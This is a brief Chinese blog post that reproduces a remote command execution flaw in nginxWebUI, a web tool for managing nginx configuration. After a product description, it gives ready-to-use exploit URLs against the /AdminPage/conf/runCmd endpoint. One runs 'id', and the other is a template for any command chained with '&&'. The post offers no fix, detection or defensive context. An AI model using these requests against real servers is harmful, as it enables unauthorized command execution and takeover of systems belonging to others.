nginxWebUI runCmd命令执行漏洞复现

系统描述

NginxWebUI 是一款图形化管理 nginx 配置的工具,可以使用网页来快速配置 nginx单机与集群的各项功能,包括 http协议转发,tcp协议转发,反向代理,负载均衡,静态 html服务器,ssl证书自动申请、续签、配置等,配置好后可一建生成 nginx.conf文件,同时可控制 nginx使用此文件进行启动与重载,完成对 nginx的图形化控制闭环。

漏洞复现

访问url

复制代码
url地址 + /AdminPage/conf/runCmd?cmd=id%26%26echo%20nginx
复制代码
url地址 + /AdminPage/conf/runCmd?cmd=命令%26%26echo%20nginx
相关推荐
利刃大大2 小时前
【高并发服务器】三、正则表达式的使用
服务器·c++·正则表达式·项目
芝士小宇2 小时前
tcp 服务器的设计思路
服务器·网络·tcp/ip
wu~9702 小时前
web服务器有哪些?服务器和web服务器有什么区别
运维·服务器·前端
₯㎕星空&繁华2 小时前
阿里云服务器安装MySQL服务器
服务器·ubuntu·阿里云·云计算
爱倒腾的老唐2 小时前
13、Linux 基本权限
linux·运维·服务器
罗政3 小时前
CentOS 7.6 系统源码部署 HivisionIDPhotos
linux·运维·centos
cililin3 小时前
第4章 文件管理
linux·服务器·网络·操作系统·unix
薰衣草23334 小时前
linux练习-2
linux·运维·服务器
驰羽4 小时前
C++网络编程(三)TCP通信流程
服务器·网络·tcp/ip
夏日漱石_5 小时前
tcp 服务器的设计思路
服务器·网络·tcp/ip